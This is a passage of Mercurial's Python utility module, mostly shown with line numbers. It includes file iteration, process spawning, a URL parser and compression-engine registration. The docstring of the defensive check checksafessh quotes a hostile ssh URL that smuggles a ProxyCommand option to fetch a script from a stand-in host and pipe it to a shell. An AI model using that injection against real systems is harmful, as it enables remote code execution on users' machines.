2582 2586 if (pyplatform.python_implementation() == 'CPython' and
2583 2587 sys.version_info < (3, 0)):
2584 2588 # There is an issue in CPython that some IO methods do not handle EINTR
2585 2589 # correctly. The following table shows what CPython version (and functions)
2586 2590 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 2591 #
2588 2592 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 2593 # --------------------------------------------------
2590 2594 # fp.__iter__ | buggy | buggy | okay
2591 2595 # fp.read* | buggy | okay [1] | okay
2592 2596 #
2593 2597 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 2598 #
2595 2599 # Here we work around the EINTR issue for fileobj.__iter__. Other methods
2596 2600 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 2601 #
2598 2602 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 2603 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 2604 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 2605 # fp.__iter__ but not other fp.read* methods.
2602 2606 #
2603 2607 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 2608 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 2609 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 2610 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 2611 # to minimize the performance impact.
2608 2612 if sys.version_info >= (2, 7, 4):
2609 2613 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 2614 def _safeiterfile(fp):
2611 2615 return iter(fp.readline, '')
2612 2616 else:
2613 2617 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 2618 # note: this may block longer than necessary because of bufsize.
2615 2619 def _safeiterfile(fp, bufsize=4096):
2616 2620 fd = fp.fileno()
2617 2621 line = ''
2618 2622 while True:
2619 2623 try:
2620 2624 buf = os.read(fd, bufsize)
2621 2625 except OSError as ex:
2622 2626 # os.read only raises EINTR before any data is read
2623 2627 if ex.errno == errno.EINTR:
2624 2628 continue
2625 2629 else:
2626 2630 raise
2627 2631 line += buf
2628 2632 if '\n' in buf:
2629 2633 splitted = line.splitlines(True)
2630 2634 line = ''
2631 2635 for l in splitted:
2632 2636 if l[-1] == '\n':
2633 2637 yield l
2634 2638 else:
2635 2639 line = l
2636 2640 if not buf:
2637 2641 break
2638 2642 if line:
2639 2643 yield line
2640 2644
2641 2645 def iterfile(fp):
2642 2646 fastpath = True
2643 2647 if type(fp) is file:
2644 2648 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 2649 if fastpath:
2646 2650 return fp
2647 2651 else:
2648 2652 return _safeiterfile(fp)
2649 2653 else:
2650 2654 # PyPy and CPython 3 do not have the EINTR issue, thus no workaround is needed.
2651 2655 def iterfile(fp):
2652 2656 return fp
2653 2657
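# Illustrative sketch (not part of the original module): reading lines
# through iterfile() so that, on the affected CPython 2 versions above,
# EINTR from a pipe or tty does not abort the loop ('fp' and 'process'
# are hypothetical).
#
#     for line in iterfile(fp):
#         process(line)
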
2654 2658 def iterlines(iterator):
2655 2659 for chunk in iterator:
2656 2660 for line in chunk.splitlines():
2657 2661 yield line
2658 2662
2659 2663 def expandpath(path):
2660 2664 return os.path.expanduser(os.path.expandvars(path))
2661 2665
2662 2666 def hgcmd():
2663 2667 """Return the command used to execute current hg
2664 2668
2665 2669 This is different from hgexecutable() because on Windows we want
2666 2670 to avoid things like batch files that open new shell windows, so we
2667 2671 get either the python call or the current executable.
2668 2672 """
2669 2673 if mainfrozen():
2670 2674 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 2675 # Env variable set by py2app
2672 2676 return [encoding.environ['EXECUTABLEPATH']]
2673 2677 else:
2674 2678 return [pycompat.sysexecutable]
2675 2679 return gethgcmd()
2676 2680
2677 2681 def rundetached(args, condfn):
2678 2682 """Execute the argument list in a detached process.
2679 2683
2680 2684 condfn is a callable which is called repeatedly and should return
2681 2685 True once the child process is known to have started successfully.
2682 2686 At this point, the child process PID is returned. If the child
2683 2687 process fails to start or finishes before condfn() evaluates to
2684 2688 True, return -1.
2685 2689 """
2686 2690 # Windows case is easier because the child process is either
2687 2691 # successfully starting and validating the condition or exiting
2688 2692 # on failure. We just poll on its PID. On Unix, if the child
2689 2693 # process fails to start, it will be left in a zombie state until
2690 2694 # the parent waits on it, which we cannot do since we expect a long
2691 2695 # running process on success. Instead we listen for SIGCHLD telling
2692 2696 # us our child process terminated.
2693 2697 terminated = set()
2694 2698 def handler(signum, frame):
2695 2699 terminated.add(os.wait())
2696 2700 prevhandler = None
2697 2701 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 2702 if SIGCHLD is not None:
2699 2703 prevhandler = signal.signal(SIGCHLD, handler)
2700 2704 try:
2701 2705 pid = spawndetached(args)
2702 2706 while not condfn():
2703 2707 if ((pid in terminated or not testpid(pid))
2704 2708 and not condfn()):
2705 2709 return -1
2706 2710 time.sleep(0.1)
2707 2711 return pid
2708 2712 finally:
2709 2713 if prevhandler is not None:
2710 2714 signal.signal(signal.SIGCHLD, prevhandler)
2711 2715
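# Illustrative sketch (not part of the original module): detaching an
# 'hg serve' process and polling until its port answers. 'serverup' is a
# hypothetical readiness probe.
#
#     pid = rundetached([b'hg', b'serve', b'-p', b'8000'],
#                       condfn=lambda: serverup(8000))
#     if pid < 0:
#         raise error.Abort(_('server failed to start'))
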
2712 2716 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2713 2717 """Return the result of interpolating items in the mapping into string s.
2714 2718
2715 2719 prefix is a single character string, or a two character string with
2716 2720 a backslash as the first character if the prefix needs to be escaped in
2717 2721 a regular expression.
2718 2722
2719 2723 fn is an optional function that will be applied to the replacement text
2720 2724 just before replacement.
2721 2725
2722 2726 escape_prefix is an optional flag that allows using doubled prefix for
2723 2727 its escaping.
2724 2728 """
2725 2729 fn = fn or (lambda s: s)
2726 2730 patterns = '|'.join(mapping.keys())
2727 2731 if escape_prefix:
2728 2732 patterns += '|' + prefix
2729 2733 if len(prefix) > 1:
2730 2734 prefix_char = prefix[1:]
2731 2735 else:
2732 2736 prefix_char = prefix
2733 2737 mapping[prefix_char] = prefix_char
2734 2738 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2735 2739 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2736 2740
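# Illustrative sketch (not part of the original module): expanding
# '%'-style placeholders with interpolate(). Mapping keys are matched
# right after the prefix character, so they must be safe inside a
# regular expression.
#
#     mapping = {b'user': b'alice', b'repo': b'hg'}
#     interpolate(b'%', mapping, b'%user pushed to %repo')
#     # -> 'alice pushed to hg'
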
2737 2741 def getport(port):
2738 2742 """Return the port for a given network service.
2739 2743
2740 2744 If port is an integer, it's returned as is. If it's a string, it's
2741 2745 looked up using socket.getservbyname(). If there's no matching
2742 2746 service, error.Abort is raised.
2743 2747 """
2744 2748 try:
2745 2749 return int(port)
2746 2750 except ValueError:
2747 2751 pass
2748 2752
2749 2753 try:
2750 2754 return socket.getservbyname(pycompat.sysstr(port))
2751 2755 except socket.error:
2752 2756 raise Abort(_("no port number associated with service '%s'") % port)
2753 2757
2754 2758 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2755 2759 '0': False, 'no': False, 'false': False, 'off': False,
2756 2760 'never': False}
2757 2761
2758 2762 def parsebool(s):
2759 2763 """Parse s into a boolean.
2760 2764
2761 2765 If s is not a valid boolean, returns None.
2762 2766 """
2763 2767 return _booleans.get(s.lower(), None)
2764 2768
2765 2769 _hextochr = dict((a + b, chr(int(a + b, 16)))
2766 2770 for a in string.hexdigits for b in string.hexdigits)
2767 2771
2768 2772 class url(object):
2769 2773 r"""Reliable URL parser.
2770 2774
2771 2775 This parses URLs and provides attributes for the following
2772 2776 components:
2773 2777
2774 2778 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2775 2779
2776 2780 Missing components are set to None. The only exception is
2777 2781 fragment, which is set to '' if present but empty.
2778 2782
2779 2783 If parsefragment is False, fragment is included in query. If
2780 2784 parsequery is False, query is included in path. If both are
2781 2785 False, both fragment and query are included in path.
2782 2786
2783 2787 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2784 2788
2785 2789 Note that for backward compatibility reasons, bundle URLs do not
2786 2790 take host names. That means 'bundle://../' has a path of '../'.
2787 2791
2788 2792 Examples:
2789 2793
2790 2794 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2791 2795 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2792 2796 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2793 2797 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2794 2798 >>> url(b'file:///home/joe/repo')
2795 2799 <url scheme: 'file', path: '/home/joe/repo'>
2796 2800 >>> url(b'file:///c:/temp/foo/')
2797 2801 <url scheme: 'file', path: 'c:/temp/foo/'>
2798 2802 >>> url(b'bundle:foo')
2799 2803 <url scheme: 'bundle', path: 'foo'>
2800 2804 >>> url(b'bundle://../foo')
2801 2805 <url scheme: 'bundle', path: '../foo'>
2802 2806 >>> url(br'c:\foo\bar')
2803 2807 <url path: 'c:\\foo\\bar'>
2804 2808 >>> url(br'\\blah\blah\blah')
2805 2809 <url path: '\\\\blah\\blah\\blah'>
2806 2810 >>> url(br'\\blah\blah\blah#baz')
2807 2811 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2808 2812 >>> url(br'file:///C:\users\me')
2809 2813 <url scheme: 'file', path: 'C:\\users\\me'>
2810 2814
2811 2815 Authentication credentials:
2812 2816
2813 2817 >>> url(b'ssh://joe:xyz@x/repo')
2814 2818 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2815 2819 >>> url(b'ssh://joe@x/repo')
2816 2820 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2817 2821
2818 2822 Query strings and fragments:
2819 2823
2820 2824 >>> url(b'http://host/a?b#c')
2821 2825 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2822 2826 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2823 2827 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2824 2828
2825 2829 Empty path:
2826 2830
2827 2831 >>> url(b'')
2828 2832 <url path: ''>
2829 2833 >>> url(b'#a')
2830 2834 <url path: '', fragment: 'a'>
2831 2835 >>> url(b'http://host/')
2832 2836 <url scheme: 'http', host: 'host', path: ''>
2833 2837 >>> url(b'http://host/#a')
2834 2838 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2835 2839
2836 2840 Only scheme:
2837 2841
2838 2842 >>> url(b'http:')
2839 2843 <url scheme: 'http'>
2840 2844 """
2841 2845
2842 2846 _safechars = "!~*'()+"
2843 2847 _safepchars = "/!~*'()+:\\"
2844 2848 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2845 2849
2846 2850 def __init__(self, path, parsequery=True, parsefragment=True):
2847 2851 # We slowly chomp away at path until we have only the path left
2848 2852 self.scheme = self.user = self.passwd = self.host = None
2849 2853 self.port = self.path = self.query = self.fragment = None
2850 2854 self._localpath = True
2851 2855 self._hostport = ''
2852 2856 self._origpath = path
2853 2857
2854 2858 if parsefragment and '#' in path:
2855 2859 path, self.fragment = path.split('#', 1)
2856 2860
2857 2861 # special case for Windows drive letters and UNC paths
2858 2862 if hasdriveletter(path) or path.startswith('\\\\'):
2859 2863 self.path = path
2860 2864 return
2861 2865
2862 2866 # For compatibility reasons, we can't handle bundle paths as
2863 2867 # normal URLS
2864 2868 if path.startswith('bundle:'):
2865 2869 self.scheme = 'bundle'
2866 2870 path = path[7:]
2867 2871 if path.startswith('//'):
2868 2872 path = path[2:]
2869 2873 self.path = path
2870 2874 return
2871 2875
2872 2876 if self._matchscheme(path):
2873 2877 parts = path.split(':', 1)
2874 2878 if parts[0]:
2875 2879 self.scheme, path = parts
2876 2880 self._localpath = False
2877 2881
2878 2882 if not path:
2879 2883 path = None
2880 2884 if self._localpath:
2881 2885 self.path = ''
2882 2886 return
2883 2887 else:
2884 2888 if self._localpath:
2885 2889 self.path = path
2886 2890 return
2887 2891
2888 2892 if parsequery and '?' in path:
2889 2893 path, self.query = path.split('?', 1)
2890 2894 if not path:
2891 2895 path = None
2892 2896 if not self.query:
2893 2897 self.query = None
2894 2898
2895 2899 # // is required to specify a host/authority
2896 2900 if path and path.startswith('//'):
2897 2901 parts = path[2:].split('/', 1)
2898 2902 if len(parts) > 1:
2899 2903 self.host, path = parts
2900 2904 else:
2901 2905 self.host = parts[0]
2902 2906 path = None
2903 2907 if not self.host:
2904 2908 self.host = None
2905 2909 # path of file:///d is /d
2906 2910 # path of file:///d:/ is d:/, not /d:/
2907 2911 if path and not hasdriveletter(path):
2908 2912 path = '/' + path
2909 2913
2910 2914 if self.host and '@' in self.host:
2911 2915 self.user, self.host = self.host.rsplit('@', 1)
2912 2916 if ':' in self.user:
2913 2917 self.user, self.passwd = self.user.split(':', 1)
2914 2918 if not self.host:
2915 2919 self.host = None
2916 2920
2917 2921 # Don't split on colons in IPv6 addresses without ports
2918 2922 if (self.host and ':' in self.host and
2919 2923 not (self.host.startswith('[') and self.host.endswith(']'))):
2920 2924 self._hostport = self.host
2921 2925 self.host, self.port = self.host.rsplit(':', 1)
2922 2926 if not self.host:
2923 2927 self.host = None
2924 2928
2925 2929 if (self.host and self.scheme == 'file' and
2926 2930 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2927 2931 raise Abort(_('file:// URLs can only refer to localhost'))
2928 2932
2929 2933 self.path = path
2930 2934
2931 2935 # leave the query string escaped
2932 2936 for a in ('user', 'passwd', 'host', 'port',
2933 2937 'path', 'fragment'):
2934 2938 v = getattr(self, a)
2935 2939 if v is not None:
2936 2940 setattr(self, a, urlreq.unquote(v))
2937 2941
2938 2942 @encoding.strmethod
2939 2943 def __repr__(self):
2940 2944 attrs = []
2941 2945 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2942 2946 'query', 'fragment'):
2943 2947 v = getattr(self, a)
2944 2948 if v is not None:
2945 2949 attrs.append('%s: %r' % (a, v))
2946 2950 return '<url %s>' % ', '.join(attrs)
2947 2951
2948 2952 def __bytes__(self):
2949 2953 r"""Join the URL's components back into a URL string.
2950 2954
2951 2955 Examples:
2952 2956
2953 2957 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2954 2958 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2955 2959 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2956 2960 'http://user:pw@host:80/?foo=bar&baz=42'
2957 2961 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2958 2962 'http://user:pw@host:80/?foo=bar%3dbaz'
2959 2963 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2960 2964 'ssh://user:pw@[::1]:2200//home/joe#'
2961 2965 >>> bytes(url(b'http://localhost:80//'))
2962 2966 'http://localhost:80//'
2963 2967 >>> bytes(url(b'http://localhost:80/'))
2964 2968 'http://localhost:80/'
2965 2969 >>> bytes(url(b'http://localhost:80'))
2966 2970 'http://localhost:80/'
2967 2971 >>> bytes(url(b'bundle:foo'))
2968 2972 'bundle:foo'
2969 2973 >>> bytes(url(b'bundle://../foo'))
2970 2974 'bundle:../foo'
2971 2975 >>> bytes(url(b'path'))
2972 2976 'path'
2973 2977 >>> bytes(url(b'file:///tmp/foo/bar'))
2974 2978 'file:///tmp/foo/bar'
2975 2979 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2976 2980 'file:///c:/tmp/foo/bar'
2977 2981 >>> print(url(br'bundle:foo\bar'))
2978 2982 bundle:foo\bar
2979 2983 >>> print(url(br'file:///D:\data\hg'))
2980 2984 file:///D:\data\hg
2981 2985 """
2982 2986 if self._localpath:
2983 2987 s = self.path
2984 2988 if self.scheme == 'bundle':
2985 2989 s = 'bundle:' + s
2986 2990 if self.fragment:
2987 2991 s += '#' + self.fragment
2988 2992 return s
2989 2993
2990 2994 s = self.scheme + ':'
2991 2995 if self.user or self.passwd or self.host:
2992 2996 s += '//'
2993 2997 elif self.scheme and (not self.path or self.path.startswith('/')
2994 2998 or hasdriveletter(self.path)):
2995 2999 s += '//'
2996 3000 if hasdriveletter(self.path):
2997 3001 s += '/'
2998 3002 if self.user:
2999 3003 s += urlreq.quote(self.user, safe=self._safechars)
3000 3004 if self.passwd:
3001 3005 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3002 3006 if self.user or self.passwd:
3003 3007 s += '@'
3004 3008 if self.host:
3005 3009 if not (self.host.startswith('[') and self.host.endswith(']')):
3006 3010 s += urlreq.quote(self.host)
3007 3011 else:
3008 3012 s += self.host
3009 3013 if self.port:
3010 3014 s += ':' + urlreq.quote(self.port)
3011 3015 if self.host:
3012 3016 s += '/'
3013 3017 if self.path:
3014 3018 # TODO: similar to the query string, we should not unescape the
3015 3019 # path when we store it, the path might contain '%2f' = '/',
3016 3020 # which we should *not* escape.
3017 3021 s += urlreq.quote(self.path, safe=self._safepchars)
3018 3022 if self.query:
3019 3023 # we store the query in escaped form.
3020 3024 s += '?' + self.query
3021 3025 if self.fragment is not None:
3022 3026 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3023 3027 return s
3024 3028
3025 3029 __str__ = encoding.strmethod(__bytes__)
3026 3030
3027 3031 def authinfo(self):
3028 3032 user, passwd = self.user, self.passwd
3029 3033 try:
3030 3034 self.user, self.passwd = None, None
3031 3035 s = bytes(self)
3032 3036 finally:
3033 3037 self.user, self.passwd = user, passwd
3034 3038 if not self.user:
3035 3039 return (s, None)
3036 3040 # authinfo[1] is passed to urllib2 password manager, and its
3037 3041 # URIs must not contain credentials. The host is passed in the
3038 3042 # URIs list because Python < 2.4.3 uses only that to search for
3039 3043 # a password.
3040 3044 return (s, (None, (s, self.host),
3041 3045 self.user, self.passwd or ''))
3042 3046
3043 3047 def isabs(self):
3044 3048 if self.scheme and self.scheme != 'file':
3045 3049 return True # remote URL
3046 3050 if hasdriveletter(self.path):
3047 3051 return True # absolute for our purposes - can't be joined()
3048 3052 if self.path.startswith(br'\\'):
3049 3053 return True # Windows UNC path
3050 3054 if self.path.startswith('/'):
3051 3055 return True # POSIX-style
3052 3056 return False
3053 3057
3054 3058 def localpath(self):
3055 3059 if self.scheme == 'file' or self.scheme == 'bundle':
3056 3060 path = self.path or '/'
3057 3061 # For Windows, we need to promote hosts containing drive
3058 3062 # letters to paths with drive letters.
3059 3063 if hasdriveletter(self._hostport):
3060 3064 path = self._hostport + '/' + self.path
3061 3065 elif (self.host is not None and self.path
3062 3066 and not hasdriveletter(path)):
3063 3067 path = '/' + path
3064 3068 return path
3065 3069 return self._origpath
3066 3070
3067 3071 def islocal(self):
3068 3072 '''whether localpath will return something that posixfile can open'''
3069 3073 return (not self.scheme or self.scheme == 'file'
3070 3074 or self.scheme == 'bundle')
3071 3075
3072 3076 def hasscheme(path):
3073 3077 return bool(url(path).scheme)
3074 3078
3075 3079 def hasdriveletter(path):
3076 3080 return path and path[1:2] == ':' and path[0:1].isalpha()
3077 3081
3078 3082 def urllocalpath(path):
3079 3083 return url(path, parsequery=False, parsefragment=False).localpath()
3080 3084
3081 3085 def checksafessh(path):
3082 3086 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3083 3087
3084 3088 This is a sanity check for ssh urls. ssh will parse the first item as
3085 3089 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3086 3090 Let's prevent these potentially exploited urls entirely and warn the
3087 3091 user.
3088 3092
3089 3093 Raises an error.Abort when the url is unsafe.
3090 3094 """
3091 3095 path = urlreq.unquote(path)
3092 3096 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3093 3097 raise error.Abort(_('potentially unsafe url: %r') %
3094 3098 (path,))
3095 3099
3096 3100 def hidepassword(u):
3097 3101 '''hide user credential in a url string'''
3098 3102 u = url(u)
3099 3103 if u.passwd:
3100 3104 u.passwd = '***'
3101 3105 return bytes(u)
3102 3106
3103 3107 def removeauth(u):
3104 3108 '''remove all authentication information from a url string'''
3105 3109 u = url(u)
3106 3110 u.user = u.passwd = None
3107 3111 return bytes(u)
3108 3112
3109 3113 timecount = unitcountfn(
3110 3114 (1, 1e3, _('%.0f s')),
3111 3115 (100, 1, _('%.1f s')),
3112 3116 (10, 1, _('%.2f s')),
3113 3117 (1, 1, _('%.3f s')),
3114 3118 (100, 0.001, _('%.1f ms')),
3115 3119 (10, 0.001, _('%.2f ms')),
3116 3120 (1, 0.001, _('%.3f ms')),
3117 3121 (100, 0.000001, _('%.1f us')),
3118 3122 (10, 0.000001, _('%.2f us')),
3119 3123 (1, 0.000001, _('%.3f us')),
3120 3124 (100, 0.000000001, _('%.1f ns')),
3121 3125 (10, 0.000000001, _('%.2f ns')),
3122 3126 (1, 0.000000001, _('%.3f ns')),
3123 3127 )
3124 3128
3125 3129 _timenesting = [0]
3126 3130
3127 3131 def timed(func):
3128 3132 '''Report the execution time of a function call to stderr.
3129 3133
3130 3134 During development, use as a decorator when you need to measure
3131 3135 the cost of a function, e.g. as follows:
3132 3136
3133 3137 @util.timed
3134 3138 def foo(a, b, c):
3135 3139 pass
3136 3140 '''
3137 3141
3138 3142 def wrapper(*args, **kwargs):
3139 3143 start = timer()
3140 3144 indent = 2
3141 3145 _timenesting[0] += indent
3142 3146 try:
3143 3147 return func(*args, **kwargs)
3144 3148 finally:
3145 3149 elapsed = timer() - start
3146 3150 _timenesting[0] -= indent
3147 3151 stderr.write('%s%s: %s\n' %
3148 3152 (' ' * _timenesting[0], func.__name__,
3149 3153 timecount(elapsed)))
3150 3154 return wrapper
3151 3155
3152 3156 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3153 3157 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3154 3158
3155 3159 def sizetoint(s):
3156 3160 '''Convert a space specifier to a byte count.
3157 3161
3158 3162 >>> sizetoint(b'30')
3159 3163 30
3160 3164 >>> sizetoint(b'2.2kb')
3161 3165 2252
3162 3166 >>> sizetoint(b'6M')
3163 3167 6291456
3164 3168 '''
3165 3169 t = s.strip().lower()
3166 3170 try:
3167 3171 for k, u in _sizeunits:
3168 3172 if t.endswith(k):
3169 3173 return int(float(t[:-len(k)]) * u)
3170 3174 return int(t)
3171 3175 except ValueError:
3172 3176 raise error.ParseError(_("couldn't parse size: %s") % s)
3173 3177
3174 3178 class hooks(object):
3175 3179 '''A collection of hook functions that can be used to extend a
3176 3180 function's behavior. Hooks are called in lexicographic order,
3177 3181 based on the names of their sources.'''
3178 3182
3179 3183 def __init__(self):
3180 3184 self._hooks = []
3181 3185
3182 3186 def add(self, source, hook):
3183 3187 self._hooks.append((source, hook))
3184 3188
3185 3189 def __call__(self, *args):
3186 3190 self._hooks.sort(key=lambda x: x[0])
3187 3191 results = []
3188 3192 for source, hook in self._hooks:
3189 3193 results.append(hook(*args))
3190 3194 return results
3191 3195
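# Illustrative sketch (not part of the original module): hooks run sorted
# by source name, so 'aaa-ext' fires before 'zzz-ext' regardless of
# registration order ('repo', 'audit' and 'log' are hypothetical).
#
#     postpush = hooks()
#     postpush.add(b'zzz-ext', log)
#     postpush.add(b'aaa-ext', audit)
#     results = postpush(repo)  # calls audit(repo), then log(repo)
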
3192 3196 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3193 3197 '''Yields lines for a nicely formatted stacktrace.
3194 3198 Skips the 'skip' last entries, then returns the last 'depth' entries.
3195 3199 Each file+linenumber is formatted according to fileline.
3196 3200 Each line is formatted according to line.
3197 3201 If line is None, it yields:
3198 3202 length of longest filepath+line number,
3199 3203 filepath+linenumber,
3200 3204 function
3201 3205
3202 3206 Not to be used in production code, but very convenient while developing.
3203 3207 '''
3204 3208 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3205 3209 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3206 3210 ][-depth:]
3207 3211 if entries:
3208 3212 fnmax = max(len(entry[0]) for entry in entries)
3209 3213 for fnln, func in entries:
3210 3214 if line is None:
3211 3215 yield (fnmax, fnln, func)
3212 3216 else:
3213 3217 yield line % (fnmax, fnln, func)
3214 3218
3215 3219 def debugstacktrace(msg='stacktrace', skip=0,
3216 3220 f=stderr, otherf=stdout, depth=0):
3217 3221 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3218 3222 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3219 3223 By default it will flush stdout first.
3220 3224 It can be used everywhere and intentionally does not require a ui object.
3221 3225 Not to be used in production code, but very convenient while developing.
3222 3226 '''
3223 3227 if otherf:
3224 3228 otherf.flush()
3225 3229 f.write('%s at:\n' % msg.rstrip())
3226 3230 for line in getstackframes(skip + 1, depth=depth):
3227 3231 f.write(line)
3228 3232 f.flush()
3229 3233
3230 3234 class dirs(object):
3231 3235 '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # bundlename may be None, indicating no external-facing name.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

